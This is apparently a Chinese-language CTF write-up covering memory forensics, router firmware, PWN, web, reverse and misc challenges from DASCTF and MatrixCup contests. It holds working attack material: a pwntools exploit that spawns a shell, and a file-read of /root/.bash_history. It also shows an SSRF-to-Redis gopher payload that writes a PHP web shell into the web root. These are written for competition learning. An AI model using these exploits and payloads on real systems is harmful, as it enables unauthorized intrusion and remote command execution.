def iterate_and_decrypt_archives():
    """Iterates over archives from 320.zip down to 0.zip, attempting decryption with keys from 0 to 255."""
    for archive_index in reversed(range(321)):
        archive_name = f"{archive_index}.zip"
        for key_index in range(256):
            hex_key = f'{key_index:02x}'
            if decrypt_archive_with_hex_key(archive_name, hex_key):
                break

if __name__ == "__main__":
    iterate_and_decrypt_archives()

image

看起来和解密密钥有关系。

image

然后发现了密钥是循环的,从11 BB ......4E C6,这样的话,提取出来就是:

11bb9985c016a3785ce42184a07affc897f817da82f0b66ad9a4445222e5e46c

但是AES解密不对,结果要把密钥反过来:

image

DASCTF{514755c6-8280-463c-8378-a29702fc88df}

ServerMem

https://xz.aliyun.com/t/11800

https://xz.aliyun.com/t/13195

Linux内存取证,要做符号表,但其实可以不用,直接strings就好了

个人习惯先过一遍可疑文件:

image

发现有个这个S3rCr3t.tar.gz​,并且说明了加密类型是openssl的aes256​,经过这种加密的特征就是Salted_​加盐值,拖进winhex里:

image

发现有命令,导出来:

image

OK,剩下的就是爆搜密钥了,ctfer常见的密钥:keyDASCTFPassword​ 然后在这里面加数字呗,这样写个脚本就好了:

import re

# 要搜索的字符列表
search_terms = [
    b"key", b"password", b"dasctf", b"k3y", b"p@ssword", b"passw0rd",
    b"p@ssw0rd", b"secret", b"s3cret", b"s3cr3t", b"s3cre4"#遇到一个加一个,CTFer的好习惯
]

# 要搜索的文件路径
file_path = "out.lime"

# 读取文件内容
with open(file_path, "rb") as file:
    data = file.read()

# 搜索字符并打印结果
for term in search_terms:
    # 后面可以跟随任意字符的模式
    regex = re.compile(re.escape(term) + b".*", re.IGNORECASE)
    for match in regex.finditer(data):
        matched_text = match.group()
        print(f"Found '{term.decode()}' match: {matched_text[:50]}...")  # 只显示前50个字节

# 内存取证是这样的,而我们非预期选手考虑的就很多了

QQ_1721559724408

找到了密钥:P@ssW0rdddd

然后就是OpenSSL还得用原来版本的进行解密,CentOS镜像我没拉取下来,于是直接更换了某个docker里openssl

https://blog.csdn.net/weixin_44174099/article/details/122089980

image

更换成功,有命令,直接解密就好了

image

image

DASCTF{c086cd55-b86a-4ee6-8933-c8bee578148a}

MatrixCup Cyber Security Competiton | QUALS Writeup by Mini-Venom

能去青岛找 fakes0u1 吃饭了

IOT

special

文件头被修改了

image

修改hs9s为hsqs即可binwalk解包

根据/web​中的信息知道是totolink

根据这篇文章

https://github.com/hurricane618/my_cves/blob/master/router/totolink/A720R_leak_config_file.md

通过apmib_decode来提取配置文件就可以找到用户名和密码

https://github.com/H4lo/apmibConfigFileDecode

image

得到密码:H3r0s1mpl3

md5(H3r0s1mpl3​)= 0e327444a0ef9a1819c341f396d97b18

PWN

fshell

存在一定混淆,ida没法在main函数f5.

根据汇编分析可知明面上有5个功能函数,实则有第六个,会修改flt_8105300段为可执行。

image

login函数简单的换位加密,直接解密得到passwd:ozrrvnqc

image

decrypt函数有个判断:

image

只要满足[ebp-0x20]​为0就会进入后门函数

decrypt接收字符的地址为ebp-0x34​,限制20个字符。

rot函数进行解密,遇到0才停止,利用其可以将ebp-0x20​的字符置0进入后门函数。

image

int​转为long double​再转为float​然后变成shellcode​。

直接爆破可以发现v3的后两个字节可以任意控制,第三个字节只能在0-0x35​之间,刚好可以构造push jmp​和pop jmp

image

利用残留的寄存器值实现read​的调用,然后写入shellcode​即可。

exp:

from pwn import *

p = process('./main')
context.arch = 'x86'
p.recvuntil('@:')
p.sendline('1')
p.recvuntil('ame:')
p.sendline('user')
p.recvuntil('ord:')
p.sendline('ozrrvnqc')
p.recvuntil('@:')
p.sendline('6')
p.recvuntil('@:')
p.sendline('3')
p.recvuntil('set:')
p.sendline('10')
p.recvuntil('pt: ')
p.sendline('k'*20)
push_eax = 0x5b597483
pop_eax = 0x5b597a33
push_ebx = 0x5b597603
pop_ebx = 0x5b597ba3
push_ecx = 0x5b59749b
pop_ecx = 0x5b597a3b
push_edx=0x5b59754e
pop_edx = 0x5b597aee
int_80 = 0x5dde8fe0
p.sendline(str(push_eax))
p.sendline(str(push_ebx))
p.sendline(str(push_ecx))
p.sendline(str(push_edx))
p.sendline(str(pop_eax))
p.sendline(str(pop_ebx))
p.sendline(str(pop_edx))
p.sendline(str(pop_ecx))
p.sendline(str(int_80))
p.sendline('1')
p.sendline(b'a'*0x22+asm(shellcraft.sh()))
p.interactive()

爆破脚本:
#include<stdio.h>
#include<string.h>
int main() {
        long long a;
        long double v11;
        int v4;
        //FILE* fp = fopen("shell.txt", "w");
        float v2;
        float v5;
        float v3;
        for (int i = 0x10000; i < 0x100000000 - 1; i++) {
                v4 = i;
                v11 = (long double)v4 / (long double)0xb4;
                v2 = v11;
                v5 = v2;
                v3 = v11;
                if (*((unsigned char*)&v5 + 3) <= 0x4a) {
                        continue;
                }
                if((*(int *)&v3)%0x1000000==0x01eb53&&v3>0){
                        printf("%#x %#x %llf\n", v4,*(int *)&v3, v11);
                        break;
                        //fprintf(fp, "%#x %#x %llf\n", v4, *(int*)&v3, v11);
                }
                //if (i % 0x10000 == 0)fflush(fp);
        }
        //fclose(fp);
}

WEB

easyweb

反斜杠bypass

image

7l8g

where

文件读取/look?file=/root/.bash_history

tantantan

有一个aaabbb.php

如果domain是127.0.0.1,报文最后就会反射给你他的回显。

image

如果是靶机地址的话就没有:

image

file:///读文件aaabbb.php

<?php
error_reporting(0);
// error_reporting(E_ALL & ~E_WARNING);
// highlight_file(__FILE__);
$url=$_POST['data'];
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
?>

dict://127.0.0.1:6379/info

有redis未授权,看来是打gopher redis

POST /aaabbb.php HTTP/1.1
Host: web-24ddad8d15.challenge.xctf.org.cn
Content-Length: 433
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://web-05574678fa.challenge.xctf.org.cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://web-05574678fa.challenge.xctf.org.cn/aaabbb.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

data=gopher%3a//127.0.0.1%3a6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252434%250D%250A%250A%250A%253C%253Fphp%2520system%2528%2524_GET%255B%2527cmd%2527%255D%2529%253B%2520%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A/var/www/html%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A

image

REVERSE

packpy

拿到附件之后,有个upx壳,用工具咋脱都不太好使,有个l_info corrupted​报错

image

文件头信息损坏了,盲猜修改了upx的特征,010打开看一手

image

image

动调之后发现控制流一直卡在这儿,硬过的话控制流直接飞了,卡了很久,实在没思路,拿着下图这句话pyi-bootloader-ignore-signals​直接百度了,百度一下,思路直接打开了

image

image

直接解包就好了

asynccode

直接把主要逻辑的pyc找个在线网站反编译一下就好了

import base58
import zlib
import marshal

try:
    scrambled_code_string = b'X1XehTQeZCsb4WSLBJBYZMjovD1x1E5wjTHh2w3j8dDxbscVa6HLEBSUTPEMsAcerwYASTaXFsCmWb1RxBfwBd6RmyePv3AevTDUiFAvV1GB94eURvtdrpYez7dF1egrwVz3EcQjHxXrpLXs2APE4MS93sMsgMgDrTFCNwTkPba31Aa2FeCSMu151LvEpwiPq5hvaZQPaY2s4pBpH16gGDoVb9MEvLn5J4cP23rEfV7EzNXMgqLUKF82mH1v7yjVCtYQhR8RprKCCtD3bekHjBH2AwES4QythgjVetUNDRpN5gfeJ99UYbZn1oRQHVmiu1sLjpq2mMm8tTuiZgfMfsktf5Suz2w8DgRX4qBKQijnuU4Jou9hduLeudXkZ85oWx9SU7MCE6gjsvy1u57VYw33vckJU6XGGZgZvSqKGR5oQKJf8MPNZi1dF8yF9MkwDdEq59jFsRUJDv7kNwig8XiuBXvmtJPV963thXCFQWQe8XGSu7kJqeRaBX1pkkQ4goJpgTLDHR1LW7bGcZ7m13KzW5mVmJHax81XLis774FjwWpApmTVuiGC2TQr2RcyUTkhGgC8R4bQiXgCsqZMoWyafcSmjdZsHmE6WgNAqPQmEg9FyjpK5f2XC1DkzuyHan5YceeEDMxKUJgJrmNcdGxB7281EyeriyuWNJVH2rVNhio6yoG'
    exec(marshal.loads(zlib.decompress(base58.b58decode(scrambled_code_string))))
finally:
    pass
return None

还有一段base58,最后exec是执行,那就直接解码之后看看

  3           0 LOAD_CONST               0 (0)
              2 LOAD_CONST               1 (None)
              4 IMPORT_NAME              0 (random)
              6 STORE_NAME               0 (random)

  5           8 LOAD_CONST               2 (b'\x18\xfa\xadd\xed\xab\xad\x9d\xe5\xc0\xad\xfa\xf9\x0be\xf9\xe5\xade6\xf9\xfd\x88\xf9\x9d\xe5\x9c\xe5\x9de\xc3))\x0f\xff')
             10 STORE_NAME               1 (encdata)

 12          12 LOAD_CONST               3 (<code object generate_key at 0x000001906F646340, file "run.py", line 5>)
             14 LOAD_CONST               4 ('generate_key')
             16 MAKE_FUNCTION            0
             18 STORE_NAME               2 (generate_key)

 19          20 LOAD_CONST               5 (<code object encrypt at 0x000001906F644F50, file "run.py", line 12>)
             22 LOAD_CONST               6 ('encrypt')
             24 MAKE_FUNCTION            0
             26 STORE_NAME               3 (encrypt)

 20          28 SETUP_FINALLY           58 (to 146)

 21          30 LOAD_NAME                4 (input)
             32 LOAD_CONST               7 ('input your flag:')
             34 CALL_FUNCTION            1
             36 STORE_NAME               5 (flag)

 22          38 LOAD_NAME                2 (generate_key)
             40 LOAD_NAME                6 (len)
             42 LOAD_NAME                5 (flag)
             44 CALL_FUNCTION            1
             46 CALL_FUNCTION            1
             48 STORE_NAME               7 (key)

 23          50 LOAD_NAME                5 (flag)
             52 LOAD_METHOD              8 (encode)
             54 CALL_METHOD              0
             56 STORE_NAME               9 (data)

 25          58 LOAD_NAME                3 (encrypt)
             60 LOAD_NAME                9 (data)
             62 LOAD_NAME                7 (key)
             64 CALL_FUNCTION            2
             66 STORE_NAME              10 (encrypted_data)

 26          68 LOAD_NAME               10 (encrypted_data)
             70 LOAD_NAME                1 (encdata)
             72 COMPARE_OP               2 (==)
             74 POP_JUMP_IF_FALSE       84 (to 168)

 27          76 LOAD_NAME               11 (print)
             78 LOAD_CONST               8 ('good')
             80 CALL_FUNCTION            1
             82 POP_TOP
             84 POP_BLOCK
             86 JUMP_FORWARD            12 (to 112)

 28          88 POP_TOP
             90 POP_TOP
             92 POP_TOP
             94 POP_EXCEPT
             96 JUMP_FORWARD             2 (to 102)
             98 <88>
            100 LOAD_CONST               1 (None)
        >>  102 RETURN_VALUE

Disassembly of <code object generate_key at 0x000001906F646340, file "run.py", line 5>:
  8           0 LOAD_GLOBAL              0 (list)
              2 LOAD_GLOBAL              1 (range)
              4 LOAD_CONST               1 (256)
              6 CALL_FUNCTION            1
              8 CALL_FUNCTION            1
             10 STORE_FAST               1 (key)

  9          12 LOAD_GLOBAL              2 (random)
             14 LOAD_METHOD              3 (seed)
             16 LOAD_FAST                0 (seed_value)
             18 CALL_METHOD              1
             20 POP_TOP

 10          22 LOAD_GLOBAL              2 (random)
             24 LOAD_METHOD              4 (shuffle)
             26 LOAD_FAST                1 (key)
             28 CALL_METHOD              1
             30 POP_TOP
             32 LOAD_GLOBAL              5 (bytes)
             34 LOAD_FAST                1 (key)
             36 CALL_FUNCTION            1
             38 RETURN_VALUE

Disassembly of <code object encrypt at 0x000001906F644F50, file "run.py", line 12>:
 15           0 LOAD_GLOBAL              0 (bytearray)
              2 CALL_FUNCTION            0
              4 STORE_FAST               2 (encrypted)

 16           6 LOAD_FAST                0 (data)
              8 GET_ITER
             10 FOR_ITER                22 (to 56)
             12 STORE_FAST               3 (byte)

 17          14 LOAD_FAST                2 (encrypted)
             16 LOAD_METHOD              1 (append)
             18 LOAD_FAST                1 (key)
        >>   20 LOAD_FAST                3 (byte)
             22 BINARY_SUBSCR
             24 LOAD_CONST               1 (95)
             26 BINARY_XOR
             28 CALL_METHOD              1
             30 POP_TOP
             32 JUMP_ABSOLUTE           10 (to 20)
             34 LOAD_GLOBAL              2 (bytes)
             36 LOAD_FAST                2 (encrypted)
             38 CALL_FUNCTION            1
             40 RETURN_VALUE

汇编出来了,直接逆

exp:

import random

def generate_key(seed_value):
    key = list(range(256))
    random.seed(seed_value)
    random.shuffle(key)
    return bytes(key)

def decrypt(encrypted_data, key):
    decrypted = bytearray()
    for byte in encrypted_data:
        decrypted.append(key.index(byte ^ 95)) 
    return bytes(decrypted).decode()

encdata = b'\x18\xfa\xadd\xed\xab\xad\x9d\xe5\xc0\xad\xfa\xf9\x0be\xf9\xe5\xade6\xf9\xfd\x88\xf9\x9d\xe5\x9c\xe5\x9de\xc3))\x0f\xff'

flag_length = len(encdata)

key = generate_key(flag_length)

flag = decrypt(encdata, key)
print(flag)

MISC

两极反转

观察原图发现,很明显右下角的校正标第一行是空白的,结合题目两极反转黑白不变,应该是反色处理。

image

同时左下角的定位符是完整的,而且定位符周围的一圈应该是空白的,所以推测被处理过的部分应该在这中间。

image

再次看题目的hint,奇变偶不变,横变竖不变,说明可能是间隔着反色的,因为不会写脚本所以用ppt手动拼图试一下,毕竟有自动对齐很好用。

右边划线的部分是推测反色的行数。

image

https://fontmeme.com/zh/invert-colors/ 随便找了个在线颜色反转工具

https://f.ws59.cn/f/e932craxy8g 过程中的图片

flag{R3Ver5e_P014r17y}

SPY2.0

USB传输PNG文件,提取出来

tshark -r attach.pcapng -T fields -e usb.capdata > data

然后去掉00​这些没用的字符,逐个包拼接出来

image

然后Steganography.js​解密就好了

asynccode

真假补丁

流量导出三个exe发现是相同的,运行之后自动解压出补丁检测.exe​和补丁修复.exe​,是python打包的,没有反编译出来,但是查看补丁修复.exe​的ascii可以看到大部分字符:

image

image

加上猜测,应该是对后面流量包里的data​传参内容进行AES_CBC解密:

密码是补丁检测.exe​的32位md5,偏移在winhex能找到:

image